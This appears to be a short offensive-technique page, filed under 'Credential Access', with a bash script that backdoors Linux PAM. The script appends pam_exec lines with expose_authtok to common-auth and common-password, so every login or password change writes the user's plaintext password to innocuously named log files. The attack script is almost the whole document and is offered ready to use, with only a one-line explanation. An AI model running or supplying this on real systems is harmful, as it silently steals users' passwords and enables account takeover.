Secondary Categories: 02-Credential Access

Each time a user authenticates or changes their password it will be logged in the log file we specified.

#!/bin/bash
# Creating a log file 
touch /var/log/systok.log
touch /var/log/syscommon.log
 
#
echo "auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat" >> /etc/pam.d/common-auth
 
echo "auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat" >> /etc/pam.d/common-password

Also Check Out:

  • PLACEHOLDER